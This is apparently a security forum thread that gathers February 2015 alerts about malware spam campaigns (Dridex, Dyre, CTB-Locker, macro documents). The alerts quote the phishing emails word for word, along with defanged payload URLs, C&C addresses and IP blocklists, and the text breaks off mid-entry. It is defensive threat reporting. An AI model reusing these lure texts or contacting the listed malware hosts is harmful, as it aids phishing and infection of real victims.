* https://www.virustotal.com/en/file/9e873d66a8663fcbccc0a959adbbc924e3cbc4cd04746411d3ffbd7d5337220e/analysis/1423653592/
** https://www.virustotal.com/en/file/10bf548e73dffefc5f4da1fa6d3d61922fec614726f18a22f49be0e8f9f7901e/analysis/1423654973/
- http://myonlinesecurity.co.uk/gail-walker-mbl-seminars-limited-outstanding-invoice-271741-word-doc-malware/
11 Feb 2015
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2015/02/Outstanding-Invoice-271741.png
:fear: :mad:
AplusWebMaster
2015-02-12, 15:38
FYI...
Fake BBB SPAM - malware
- http://blog.dynamoo.com/2015/02/malware-spam-bbb-accreditation-services.html
12 Feb 2012 - "This -fake- BBB email has a malicious attachment.
From: BBB Accreditation Services [no-replay@ newyork .bbb .org]
Date: Thu, 12 Feb 2015 10:50:01 +0000
Subject: BBB SBQ Form
Thank you for supporting your Better Business Bureau (BBB).
As a service to BBB Accredited Businesses, we try to ensure that the information we provide to potential customers is as accurate as possible. In order for us to provide the correct information to the public, we ask that you review the information that we have on file for your company.
We encourage you to print this SBQ Form, answer the questions and respond to us. (Adobe PDF)
Please look carefully at your telephone and fax numbers on this sheet, and let us know any and all numbers used for your business (including 800, 900, rollover, and remote call forwarding). Our automated system is driven by telephone/fax numbers, so having accurate information is critical for consumers to find information about your business easily.
Thank you again for your support, and we look forward to receiving this updated information.
Sincerely,
Accreditation Services
Attached is a file SQB Form.zip which contains a malicious executable SQB Form.exe. This has a VirusTotal detection rate of 4/57*. Automated analysis tools... show that attempts to connect to these following legitimate IPs and domains to determine the IP address and current time:
134.170.185.211: https://www.virustotal.com/en/ip-address/134.170.185.211/information/
time.microsoft.akadns .net
checkip.dyndns .org
Of these, checkip.dyndns .org is worth monitoring as it is often an indicator of infection.
The Anubis report also shows a DNS query to semiyun .com on 95.173.170.227*** (Netinternet, Turkey). Also the Malwr report shows connections to the following URLs:
http ://92.240.99.70:12112/1202uk11/HOME/0/51-SP:/0/ELHBEDIBEHGBEHK
http ://92.240.99.70:12112/1202uk11/HOME/41/7/4/
http ://semiyun .com/mandoc/previewa.pdf
Of these, 92.240.99.70 (Ukrainian High Technologies Ltd, Ukraine) looks like the C&C server and this should definitely be -blocked-. A file jeoQxZ5.exe is also dropped with a detection rate of 6/57**. This is most likely the Dyre banking trojan..."
* https://www.virustotal.com/en/file/262d1398851f1f43f4382812e744b3cbc484ae9f4605e03f65c3977919e32a6c/analysis/1423739716/
** https://www.virustotal.com/en/file/1d90a17f9f4a8d0a17c46a82f4e48b8a645ddde67c59cfe89becd34b20a4bd25/analysis/1423741855/
*** 95.173.170.227: https://www.virustotal.com/en/ip-address/95.173.170.227/information/
___
Fake 'invoice :reminder' SPAM - leads to CVE-2012-0158 exploit
- http://blog.dynamoo.com/2015/02/invoice-reminder-spam-leads-to-cve-2012.html
12 Feb 2015 - "This spam has a malicious attachment:
From: Hajime Daichi
Date: 12 February 2015 at 15:59
Subject: invoice :reminder
Greetings.
Please find attached invoice copy for a transfer of USD29,900.00 payed to
your company account yesterday.
You can save, view and print this SWIFT message at your convenience.
Please email should you require any additional information on this
transaction.
We thank you for your continued patronage.
Corp. Office / Showroom:
# 8-2-293/82/A/706/1,
Road No. 36, Jubilee Hills,
HYDERABAD - 500 033.
Tel: +91 40 2355 4474 / 77
Fax:+91 40 2355 4466
E-mail: info@ valueline .in
Branches : VIZAG | VIJAYAWADA | BANGALORE | MUMBA
Attached is a file INVOICE.doc which is actually not a DOC at all, but an RTF file. A scan of the file at VirusTotal indicates that it is malicious, with a detection rate of 6/57*. Those detections indicate that this is exploitng CVE-2012-0158 aka MS12-027, a security flaw patched almost three years ago. So if you keep your patches up-to-date, there's a good chance you will be OK. But if you are running an ancient version of Microsoft Office (for example Office 2000, 2002 or XP) then you could be in trouble. The Malwr report for this is quite enlightening, showing the malware downloading another document from directxex .net/7783ed117ba0d69e/wisdomjacobs.exe. This has a detection rate of 14/57** and the Malwr report for this indicates that among other things it installs a -keylogger- confirmed by the ThreatExpert report.
The domain directxex .net [Google Safebrowsing***] has an unsavoury reputation, and although it is currently hiding behind a Cloudflare IP, it actually appears to be hosted on an OVH France IP of 5.135.127.68. I definitely recommend that you -block- traffic to directxex .net."
* https://www.virustotal.com/en/file/a3a794d582a3f006981ed7c02ec540cf4b21e53bf2d7cb9fb8154a78da4b7228/analysis/1423764503/
** https://www.virustotal.com/en/file/754044eb9a2a2cc5bfbb1e955a9ef7e94c694cfde4ab59ea8e55ea68d106affb/analysis/1423765263/
*** https://www.google.com/safebrowsing/diagnostic?site=directxex.net
"... listed for suspicious activity 122 time(s) over the past 90 days...
> https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-0158 - 9.3 (HIGH)
___
Fake 'INVOICE' SPAM - malware
- http://blog.dynamoo.com/2015/02/malware-spam-minuteman-press-west-loop.html
12 Feb 2015 - "This -fake- invoice comes with a malicious attachment. It does not come from Minuteman Press, their systems have not been compromised in any way. Instead this is a simple email -forgery-.
From: Minuteman Press West Loop [westloop@ minutemanpress .com]
Reply-To: westloop@ minutemanpress .com
Date: 12 February 2015 at 09:00
Subject: INVOICE 1398 - FEB 4 2015
(Please see attached file: INVOICE 1398 - FEB 4 2015.DOC)
Thank you for your business.
Julio Lopez | Design Manager | Minuteman Press West Loop
1326 W. Washington Blvd. | Chicago, IL 60607
p 312.291.8966 | f 312.929.2472 |
I have seen just a single sample with an attachment INVOICE 1398 - FEB 4 2015.doc, although usually there are two or more variants so you may see slightly different ones. The DOC file has a VirusTotal detection rate of 0/57* and contains this malicious macro which downloads a second component from:
http ://ecinteriordesign .com/js/bin.exe
This is then saved as %TEMP%\\IHJfffFF.exe and has a detection rate of 7/57**. Automated analysis tools... show attempted connections to:
37.139.47.105
78.140.164.160
41.56.49.36
104.232.34.68
210.181.222.118
The Malwr report shows that it drops a DLL with an MD5 of 9001023d93beccd6c28ba67cbbc10cec which had a low detection rate at VT when it was checked a couple of hours ago***."
* https://www.virustotal.com/en/file/01cb3eedc33553959d548134caf0552662bbb3cdb3cc4c94dd037a6f9aa577a4/analysis/1423734590/
** https://www.virustotal.com/en/file/a42dc7abd83b0e329b846ea280c02812454acb5b98902adda8cfc786866fac5d/analysis/1423734603/
*** https://www.virustotal.com/en/file/50f6ae0daf2b2e5b2a4822d859fd3d503d9efa29871ecb286480fc8c4ffdd7c7/analysis/
___
CTB-Locker Ransomware Spoofs Chrome and Facebook Emails as Lures, Linked to Phishing
- http://blog.trendmicro.com/trendlabs-security-intelligence/ctb-locker-ransomware-spoofs-chrome-and-facebook-emails-as-lures-linked-to-phishing/
Feb 12, 2015 - "... We are seeing another wave of CTB-Locker -ransomware- making their way into the wild. What’s highly notable about this current batch of crypto-ransomware is that they are using “big names” like Facebook and Google Chrome as social engineering lures.
The New Lures: We observed that the CTB-Locker ransomware arrives through spammed emails pretending to be from Google Chrome and Facebook. The -fake- Google Chrome email pretends to be a notification about updating the recipient’s Chrome browser. Upon clicking-the-link, the user will be directed to a site hosting the malware. The malware uses a Google Chrome -icon- to disguise itself as a legitimate installer package. This is actually a variant detected as TROJ_CRYPCTB.YUX.
Fake Google Chrome email:
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2015/02/CTB-L-1.png
Another lure used by cybercriminals is Facebook. The email arrives as an account suspension notificaiton. The email instructs the user to click on an embedded link. This link will lead to the download of the malware:
Fake Facebook email:
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2015/02/CTB-L-2.png
The malware uses a .PDF icon to disguise itself as a legitimate file. This malware is detected as TROJ_CRYPCTB.NSA. Our findings show that -both- variants are hosted in -compromised- sites. And interestingly enough, each variant is hosted on a group of compromised sites that is linked to one IP address. Connections to Phishing: Digging deeper into these compromised sites, we discovered that some of these URLs are associated with phishing spam, specifically those using -PayPal- as their lure.
Fake PayPal email:
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2015/02/CTB-L-3.png
The spammed email arrives with the subject, “Take Action PayPal.” The email instructs the recipient to log in to their PayPal account to settle an issue by clicking-a-link in the email. Upon clicking, the link redirects to a phishing site. The site asks not only for the user’s login credentials, but other important, sensitive information like contact details and credit card information.
Fake PayPal site:
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2015/02/CTB-L-4.png
Information requested by the phishing site:
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2015/02/CTB-L-5.png
Once the user completes all the information, the site then redirects the person to the legitimate PayPal login page. To avoid suspicion, it uses the excuse of needing to log in -again- for the changes to fully reflect in the PayPal account. Using the same URLs as those of the CTB-Locker malware suggests that the threat actors distributing the ransomware are also dabbling in phishing... CTB-Locker variants included language support for four languages: English, German, Italian, and Dutch. This new batch of ransomware now supports seven languages, namely, French, Spanish, Latvian, German, Dutch, Italian, and English.
Ransom message:
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2015/02/CTB-L-6.png
... The malware also now arrives in a Windows installer package. The two new variants identified were wrapped in an installer using using NSIS. Cybercriminals leverage NSIS, which is an open source installer like InstallShield, to make analysis difficult. When executed, the malware drops an encrypted version of the CRYPCTB malware and a library (.DLL) file. The library file will decrypt and execute the ransomware. After the routine, the library file will delete itself. In a surprising move, the cybercriminals adjusted the ransom payment for the decryption of files to 2 BTC, a fee lower than the 3 BTC ransom fee of previous variants. The malware also uses new set of Tor Addresses to communicate with the affected system... the added languages are all for countries based in Europe. This suggests that these variants may be targeting the EMEA region...
Top countries affected by CRYPCTB malware family:
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2015/02/CTB-L-72.jpg
... Conclusion: From what we’ve seen, the threat actors focused more on improving their chances of spreading the malware than improving the design of the code itself. Once the malware is in the system, it can be very challenging to recover the files without getting their help. As we have mentioned in previous entries, it might be tempting to give in and pay the ransom fee to get back encrypted files. However, there is no guarantee that the cybercriminals will actually honor the exchange. At the very worst, the victim is left with no files and no money..."
:fear: :mad:
AplusWebMaster
2015-02-13, 17:49
FYI...
Fake 'Remittance' SPAM - malware
- http://blog.dynamoo.com/2015/02/malware-spam-remittance-xx12345678.html
13 Feb 2015 - "This -spam- comes from randomly-named companies, with slightly different body text and different subject in each case. Here is an example:
From: Gale Barlow
Date: 13 February 2015 at 12:30
Subject: Remittance IN56583285
Dear Sir/Madam,
I hope you are OK. I am writing you to let you know that total amount specified in the contract has been paid into your bank account on the 12th of February at 15:25 via BACS payment system and should reach the destination (beneficiary's) account within 3 working days.
To see full payment details please refer to the remittance advice note attached to the letter.
Any queries? Please reply back with your questions and you will receive a prompt and qualitative response as soon as possible. Please do not hesitate to write us.
Gale Barlow
Accounts Manager
4D PHARMA PLC
Boyd Huffman
Accounts Payable
GETECH GROUP
There is a malicious Word document attached to the email, so far I have only seen one version of this but usually there are two or more. The document itself has a low detection rate of 1/57* and it contains a malicious macro which downloads a file from the following location:
http ://62.76.188.221 /aksjdderwd/asdbwk/dhoei.exe
This is saved as %TEMP%\dsHHH.exe and has a detection rate of 7/57**, identifed as a Dridex downloader. Automated analysis tools... show a variety of activities, including communications with the following IPs:
85.143.166.72 (Pirix, Russia)
46.19.143.151 (Private Layer, Switzerland)
193.206.162.92 (Universita degli Studi dell'Insubria, Italy)
92.63.88.87 (MWTV, Latvia)
78.129.153.18 (iomart, UK)
205.185.119.159 (Frantech Solutions, US)
The malware then drops a Dridex DLL with a detection rate of 3/52*** and mysteriously drops another Dridex downloader with a detection rate of 6/57****. The Malwr report for that indicates there is some attempting traffic to nonexistent domains.
Recommended blocklist:
85.143.166.72
46.19.143.151
193.206.162.92
92.63.88.87
78.129.153.18
205.185.119.159 "
* https://www.virustotal.com/en/file/84ef5406a61b4fb0703768a120e9f107d569387276357d88ef77c936c1ec109a/analysis/1423835743/
** https://www.virustotal.com/en/file/2ad9b362775fe8a5a70ea4707325699123480e2827abdd2893ff566b80e86ea8/analysis/1423835772/
*** https://www.virustotal.com/en/file/c6d838b4f4635bdc23f12cb0961cbf2ed7d8358eb7259c71946aa2d3cdd816cf/analysis/1423836506/
**** https://www.virustotal.com/en/file/03a7986ae0b058e1471c549ea18dfe76a6ab162d7f696509a7f57e2abbafbdef/analysis/1423836488/
___
Fake 'PURCHASE ORDER' SPAM - doc malware
- http://myonlinesecurity.co.uk/alison-longworth-universal-sealants-uk-limited-purchase-order-34663-word-doc-malware/
13 Feb 2013 - "'Alison Longworth PURCHASE ORDER (34663)' pretending to come from Alison Longworth <ALongworth@ usluk .com> with a malicious word doc attachment is another one from the current bot runs which try to download various Trojans and password stealers especially banking credential stealers, which may include cridex, dridex, dyreza and various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment...
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2015/02/Alison-Longworth-Universal-Sealants-UK-Limited-PURCHASE-ORDER-34663.png
13 February 2015 : 2600_001.doc - Current Virus total detections: 0/46*
... which downloads stroygp .ru/js/bin.exe which is a -dridex- banking trojan and has a virus total detection rate of 9/57**... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/24520902dd5f51a74a64dcff26a16b38b2ad7a4921ef2658708eb81069ae2a85/analysis/1423834978/
** https://www.virustotal.com/en/file/307680f7fd5bd0e5828ed3d52450300b27acc575d3d62a6110a81a691a5cab56/analysis/1423836333/
... Behavioural information
TCP connections
37.139.47.105: https://www.virustotal.com/en/ip-address/37.139.47.105/information/
210.181.222.118: https://www.virustotal.com/en/ip-address/210.181.222.118/information/
86.104.134.156: https://www.virustotal.com/en/ip-address/86.104.134.156/information/
___
Something evil on 95.163.121.0/24
- http://blog.dynamoo.com/2015/02/something-evil-on-95163121024-digital.html
13 Feb 2015 - "I've written about DINETHOSTING* aka Digital Network JSC many times before, and frankly their entire IP range is a sea of crap, and I have a whole load of blocks in the 95.163.64.0/18 range (including the entirity of 95.163.64.0/10). This latest sea of badness seems to be suballocated to a customer using the 95.163.121.0/24 block.
* http://blog.dynamoo.com/search/label/DINETHOSTING
inetnum: 95.163.121.0 - 95.163.121.255
netname: RU-CLOUDAVT-NET
descr: LLC ABT Cloud Network
country: RU ...
descr: Digital Network JSC
descr: Moscow, Russia ...
Just looking at blog posts, I can see badness occurring in the recent past... That's quite a high concentration of bad servers in a relatively small block. A quick look at what is currently hosted indicates (IMHO) nothing of value, and I would recommend blocking the entire 95.163.121.0/24 range as a precaution."
___
Fake Email 'Internet Fax' SPAM - trojan
- http://blog.mxlab.eu/2015/02/13/email-internet-fax-job-contains-trojan/
Feb 13, 2015 - "... intercepted a new trojan distribution campaign by email with the subject “Internet Fax Job”. This email is send from the spoofed address “Fax job <no-replay@ fax-job .com>” and has the following body:
Image data has been attached.
The attached file Docs.zip contains the 26 kB large file Docs.exe. The trojan is known as UDS:DangerousObject.Multi.Generic, TrojanDownloader:Win32/Upatre.AW, HEUR/QVM19.1.Malware.Gen or Win32.Trojan.Inject.Auto. At the time of writing, 7 of the 57 AV engines did detect the trojan at Virus Total*..."
* https://www.virustotal.com/en/file/d507bf4d17e28d58c1692e357f3937c5eeabfe05539bc5bfcb9e9880de593349/analysis/
___
Google International Lottery Spam
- http://threattrack.tumblr.com/post/110812572283/google-international-lottery-spam
12 Feb 2015 - "Subjects Seen:
GOOGLE int
Typical e-mail details:
Congratulations on your victory in the international lottery GOOGLE INT and win in the amount of 10,000 euro.
For winning fill out the form and send it to us investing in response.
Malicious File Name and MD5:
form.exe (433DF3A8CD60E501EE0CB5B4849D82DC)
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/7f85cf5980d4bb5f1cb67c0871a8f8d5/tumblr_inline_njnzco42TJ1r6pupn.png
Tagged: Google, Lottery, Upatre
- http://myonlinesecurity.co.uk/congratulations-victory-international-lottery-google-int-fake-pdf-malware/
12 Feb 2015
> https://www.virustotal.com/en/file/288e53e14cd980925286bddb5bd48d05e5deed96e0c311fee14677f4e926420d/analysis/1423755189/
... Behavioural information
TCP connections
216.146.43.70: https://www.virustotal.com/en/ip-address/216.146.43.70/information/
92.240.99.70: https://www.virustotal.com/en/ip-address/92.240.99.70/information/
46.30.212.195: https://www.virustotal.com/en/ip-address/46.30.212.195/information/
UDP communications
198.27.81.168: https://www.virustotal.com/en/ip-address/198.27.81.168/information/
192.95.17.62: https://www.virustotal.com/en/ip-address/192.95.17.62/information/
:fear: :mad:
AplusWebMaster
2015-02-16, 13:19
FYI...
Fake 'invoice' SPAM - doc malware
- http://blog.dynamoo.com/2015/02/malware-spam-tag-automotive-group-ltd.html
16 Feb 2015 - "This -fake- invoice does not come from The Automotive Group Ltd or any similarly-named company. Their systems have not been compromised in any way. Instead, this is a -forgery- with a malicious attachment. Note that the taghire .co.uk simply shows "Under Construction".
From: Lawrence Fisher [l.fisher@ taghire .co .uk]
Date: 16 February 2015 at 08:25
Subject: invoice
Here is the invoice
Kind Regards,
Lawrence Fisher
T.A.G. (The Automotive Group) Ltd.
Unit 22 Coney Green Business Centre Wingfield View, Clay Cross, Chesterfield...
So far I have only seen one sample of this, with an attachment named Invoice 0215.doc which has zero detections according to VirusTotal*. It contains an obfuscated Word macro which downloads an additional component from:
http ://laikah .de/js/bin.exe
Usually there are two or three versions of this document, but I have only seen one. If you look at the macro code itself, the download location is not encrypted in the code although other elements of the process are encrypted with a string + key combination. Those combinations contain non-printable characters, possibly in an attempt to avoid analysis. This .exe file is downloaded as %TEMP%\345435.exe and it has a VirusTotal detection rate of 3/57**. Automated reporting tools... show that this POSTS to 37.139.47.105. It appears that communication is attempted with the following IPs:
37.139.47.105 (Pirix, Russia)
78.140.164.160 (Webazilla, US)
95.163.121.179 (Digital Networks, Russia)
86.104.134.156 (One Telecom, Moldova)
117.223.58.214 (BSNL / Broadband Multiplay, India)
109.234.38.70 (McHost, Russia)
Also, according to the Malwr report***, a DLL is dropped with a detection rate of 3/57.
Recommended blocklist:
37.139.47.105
78.140.164.160
95.163.121.179
86.104.134.156
117.223.58.214
109.234.38.70 "
* https://www.virustotal.com/en/file/ac8ad9153e36a3d3644f890770259bcd8c77a10c0eff512b4a1fccecc3eb9e26/analysis/1424078591/
** https://www.virustotal.com/en/file/971403cb96c22acecd030aeb7b25da08fd10af4a85877d8d2c49a8ac26a90796/analysis/1424078636/
*** https://malwr.com/analysis/Yzg4MGU5M2ViNzIzNGRlZDk0ZWFhNzUwOTQ3NjYwMDg/
- http://myonlinesecurity.co.uk/lawrence-fisher-t-g-automotive-group-ltd-invoice-word-doc-malware/
16 Feb 2015
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2015/02/tag-invoice.png
___
Fake 'order' SPAM - doc malware
- http://myonlinesecurity.co.uk/la-plastic-order-66990-word-doc-malware/
16 Feb 2015 - "'L&A Plastic Order# 66990' pretending to come from Hannah <Hannah@ lapackaging .com> with a malicious word doc attachment is another one from the current bot runs which try to download various Trojans and password stealers especially banking credential stealers, which may include cridex, dridex, dyreza and various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment...
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2015/02/LA-Plastic-Order-66990.png
This email has exactly the same malware although different file/document name as today’s versions of Lawrence Fisher T.A.G. (The Automotive Group) Ltd invoice - Word doc malware* and downloads the same dridex banking Trojan** from the same locations***... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* http://myonlinesecurity.co.uk/lawrence-fisher-t-g-automotive-group-ltd-invoice-word-doc-malware/
** https://www.virustotal.com/en/file/ac8ad9153e36a3d3644f890770259bcd8c77a10c0eff512b4a1fccecc3eb9e26/analysis/1424075902/
*** https://www.virustotal.com/en/file/971403cb96c22acecd030aeb7b25da08fd10af4a85877d8d2c49a8ac26a90796/analysis/1424078802/
... Behavioural information
TCP connections
37.139.47.105: https://www.virustotal.com/en/ip-address/37.139.47.105/information/
UDP communications
134.170.185.211: https://www.virustotal.com/en/ip-address/134.170.185.211/information/
___
Fake 'Copy of transaction' SPAM - xls malware
- http://blog.dynamoo.com/2015/02/malware-spam-re-data-request-id91460.html
16 Feb 2015 - "This rather terse spam comes with a malicious attachment:
From: Rosemary Gibbs
Date: 16 February 2015 at 10:12
Subject: Re: Data request [ID:91460-2234721]
Copy of transaction.
The sender's name, the ID: number and the name of the attachment vary in each case. Example attachment names are:
869B54732.xls
BE75129513.xls
C39189051.xls
None of the three attachments are detected by anti-virus vendors [1] [2] [3]. They each contain a slightly different macro... It's quite apparent that this is ROT13 encoded which you can easily decrypt at http://www.rot13.com/index.php rather than working through the macro... So, these macros are attempting to use Powershell to download and execute the next step (possibly to avoid the UAC popup). The downloaded binary has a VirusTotal detection rate of 3/57* and automated analysis tools... show attempted communications with:
85.143.166.72 (Pirix, Russia)
205.185.119.159 (FranTech Solutions, US)
92.63.88.87 (MWTV, Latvia)
173.226.183.204 (TW Telecom, Taiwan)
27.5.199.115 (Hathway Cable and Datacom, India)
149.171.76.124 (University Of New South Wales, Australia)
46.19.143.151 (Private Layer, Switzerland)
It also drops a DLL with a 4/57** detection rate which is the same malware seen in this attack***.
Recommended blocklist:
85.143.166.72
205.185.119.159
92.63.88.87
173.226.183.204
27.5.199.115
149.171.76.124
46.19.143.151 "
1] https://www.virustotal.com/en/file/b361fca70eb53e8e6a6aceaf2a4d967a64ec0459ced4f6b401d40a50d49c79c6/analysis/1424087084/
2] https://www.virustotal.com/en/file/751f4d5dfb764ca6658bf7dd125fad6af3037ed89238d2d4e1613b8e3afc5568/analysis/1424087089/
3] https://www.virustotal.com/en/file/687e6133782403537221b32503eba5cb5fd360973bc57a5e8be0fa49aa180e23/analysis/1424087096/
* https://www.virustotal.com/en/file/f3a359c36d63466abb988d8b4aa96dd8fef6fd4450dd09c123c6aa8f513d1bba/analysis/1424087041/
** https://www.virustotal.com/en/file/084a4bf0dc1ccb9f1c99f94b13fc85253dc40bce9ef996239053ae5c4b7fe1e9/analysis/1424088561/
*** http://blog.dynamoo.com/2015/02/malware-spam-tag-automotive-group-ltd.html
- http://myonlinesecurity.co.uk/copy-transaction-re-data-request-id20169-182-excel-xls-malware/
16 Feb 2015
___
Fake 'Order' SPAM - doc malware
- http://blog.dynamoo.com/2015/02/malware-spam-l-plastic-order-66990.html
16 Feb 2015 - "This -fake- financial spam does not come from LA Packaging, their systems are not compromised in any way. Instead, this is a simple -forgery- with a malicious attachment:
From: Hannah [Hannah@ lapackaging .com]
Date: 16 February 2015 at 10:38
Subject: L&A Plastic Order# 66990
For your records, please see attached L&A Order# 66990 and credit card receipt.
It has shipped today via UPS Ground Tracking# 1Z92X9070369494933
Best Regards,
Hannah – Sales
L&A Plastic Molding / LA Packaging
714-694-0101 Tel - Ext. 110
714-694-0400 Fax
E-mail: Hannah@ LAPackaging .com
Attached is a malicious Word document 66990.doc - so far I have only seen one version of this, although there are usually several variants. This document contains a macro... an executable from:
http :// hoodoba.cba .pl/js/bin.exe = 95.211.144.65: https://www.virustotal.com/en/ip-address/95.211.144.65/information/
At present this has a detection rate of 6/57*. It is the same malware as seen in this spam run**."
* https://www.virustotal.com/en/file/971403cb96c22acecd030aeb7b25da08fd10af4a85877d8d2c49a8ac26a90796/analysis/1424089760/
** http://blog.dynamoo.com/2015/02/malware-spam-tag-automotive-group-ltd.html
- http://myonlinesecurity.co.uk/la-plastic-order-66990-word-doc-malware/
16 Feb 2015
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2015/02/LA-Plastic-Order-66990.png
___
Money mule SCAM
- http://blog.dynamoo.com/2015/02/money-mule-scam-gbearncom-usaearnscom.html
16 Feb 2015 - "This spam email is attempting to recruit people to aid with money laundering ("money mules") and other illegal operations.
Date: 16 February 2015 at 21:29
Subject: New offer
Good day!
We considered your resume to be very attractive and we thought the vacant position in our company could be interesting for you.
Our firm specializes in advertisment services realizing unique products of creative advertising and branding strategies
and solutions to develop a distinctive brand value.
We cooperate with different countries and currently we have many clients in the USA and the EU.
Due to this fact, we need to increase the number of our destination representatives' regular staff.
In their duties will be included the document and payment control of our clients.
Part-time employment is currently important.
We offer a wage from 3500 GBP per month.
If you are interested in our offer, mail to us your answer on riley@ gbearn .com and
we will send you an extensive information as soon as possible.
Respectively submitted
Personnel department
The reply-to address of gbearn .com has recently been registered by the -scammers- with false WHOIS details. There is also an equivalent domain usaearns .com for recruiting US victims. Although there is no website, both domains have a mail server at 93.188.167.170 (Hostinger, US) which also serves as one of the nameservers for these domains (ns1 .recognizettrauma .net). The other nameserver (ns2 .recognizettrauma .net) is on 75.132.186.90 (Charter Communications, US). Be in no doubt that the job being offered here is -illegal- and you should most definitely avoid it."
___
Banking Trojan Dyreza sends 30,000 malicious emails in one day
- http://net-security.org/malware_news.php?id=2964
16.02.2015 - "A massive spam wave is installing banking Trojan Dyreza on tens of thousands of computers to steal sensitive financial data from unsuspecting customers, warns Bitdefender*. 30,000 malicious emails were sent in just one day from spam servers in the UK, France, Turkey, US and Russia. The spam, which has been directed to customers of UK banks including NatWest, Barclays, RBS, HSBC, Lloyds Bank and Santander, carries links to HTML files which directs users to URLs pointing to highly obfuscated Javascript code. This automatically downloads a zip archive from a remote location... each downloaded archive is named differently to bypass antivirus solutions. This technique is called server-side polymorphism and ensures that the downloaded malicious file is always brand new. To take the con one step further, the same Javascript code -redirects- the user to the localized webpage of a fax service provider as soon as the archive is downloaded..."
* http://www.hotforsecurity.com/blog/banking-trojan-lurking-inside-innocent-fax-messages-bitdefender-warns-11368.html
___
Banking malware VAWTRAK - malicious macro downloaders
> http://blog.trendmicro.com/trendlabs-security-intelligence/banking-malware-vawtrak-now-uses-malicious-macros-abuses-windows-powershell/
Feb 16, 2015
:fear::fear: :mad:
AplusWebMaster
2015-02-17, 16:37
FYI...
Something evil on 92.63.88.0/24 (MWTV, Latvia)
- http://blog.dynamoo.com/2015/02/something-evil-on-926388024-mwtv-latvia.html
17 Feb 2015 - "I've been tracking -Dridex- for some time, and I keep seeing IPs for MWTV in Latvia cropping up. So far I have seen:
92.63.88.87
92.63.88.97
92.63.88.100
92.63.88.105
92.63.88.106
92.63.88.108
I'm not sure how widely this spreads through the MWTV network, but I would certainly recommend -blocking- 92.63.88.0/24 on your network perimeter."
___
Fake 'Customer statement' SPAM - doc malware
- http://myonlinesecurity.co.uk/customer-statement-0001031389-02052015-word-doc-malware/
17 Feb 2015 - "'Customer statement 0001031389 as on 02/05/2015' pretending to come from AR.Support@efi.com and being addressed to minutemanpresschicago@ comcast .net and sent to you via a bcc with a malicious word doc attachment is another one from the current bot runs... All these emails have random invoice numbers in the subject line and the invoice number matches the attachment name & number in most cases so far today...
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2015/02/Customer-statement-0001031389.png
17 February 2015 : Customer statement 0001031389 as on 02052015.DOC
Current Virus total detections: 0/57* ... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/5ea46cf547995e30dc0f23bf3bd622195412cfdabc82b955e84cd5fdd4344d1e/analysis/1424169255/
- http://blog.dynamoo.com/2015/02/malware-spam-arsupporteficom-customer.html
17 Feb 2015
"... Recommended blocklist:
202.44.54.5
66.110.179.66
92.63.88.105 "
___
Fake 'Service Suspension' SPAM - xls malware
- http://myonlinesecurity.co.uk/service-suspension-notification-idfecc254778-excel-xls-malware/
17 Feb 2015 - "'Service Suspension Notification (random numbers)' with a malicious word excel XLS attachment is another one from the current bot runs... All these emails have random numbers in the subject line and the attachment name...
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2015/02/Service-Suspension-Notification.png
17 February 2015 : FECC254778.xls
Current Virus total detections: 1/57* ... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/ce7d7d4b45116fc63d22e1031811ce3eccea5338c19744dd9e481307cef0a4da/analysis/1424174070/
___
Fake 'Unpaid invoice' SPAM – XLS malware
- http://myonlinesecurity.co.uk/unpaid-invoice-excel-xls-malware/
17 Feb 2015 - "'Unpaid invoice [ID:AFCBF43812] ( random numbers)' with a malicious Excel XLS attachment is another one from the current bot runs... All these emails have random invoice numbers in the subject line and the invoice number matches the attachment name & number in most cases so far today...All these emails have random invoice numbers in the subject line and the invoice number matches the attachment name & number in most cases so far today. The email has a totally -blank- body...
17 February 2015 : AFCBF43812.xls - Current Virus total detections: 1/57* ... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/f0694d38c88c19bf3f891b90cbed7588a0234895c93f819a88bf27e22550f2fc/analysis/1424178689/
- http://blog.dynamoo.com/2015/02/malware-spam-unpaid-invoice-id9876543210.html
17 Feb 2015
"... fake invoice comes with no body text, a random ID: in the subject and a randomly-named malicious Excel attachment...
Recommended blocklist:
92.63.88.97
92.63.88.87
78.129.153.27
62.76.43.194
46.4.232.206
136.243.237.194
74.208.68.243 "
___
Fake 'Invoices' SPAM - PDF malware
- http://myonlinesecurity.co.uk/invoices-for-intercon-inc-sent-on-021715-from-electroshield-inc-fake-pdf-malware/
17 Feb 2015 "'Invoices for INTERCON, INC. Sent on 02/17/15 from Electroshield Inc' pretending to come from accounting@ interconinc .com with a zip attachment is another one from the current bot runs...
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2015/02/Invoices-for-INTERCON.png
17 February 2015: invoices.zip: Extracts to: invoices.exe
Current Virus total detections: 7/57* ... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/bff78dcece3b65ca5280da4a493623df0f1b105e25fc34b43e79d2677e33c448/analysis/1424188090/
___
FedEx Notification Spam
- http://threattrack.tumblr.com/post/111277461208/fedex-notification-spam
Feb 17, 2015 - "Subjects Seen
[i]Postal Notification Service
Typical e-mail details:
Dear Customer,
You parcel arrived, read the account in the attachment.
Consignment: #149700366
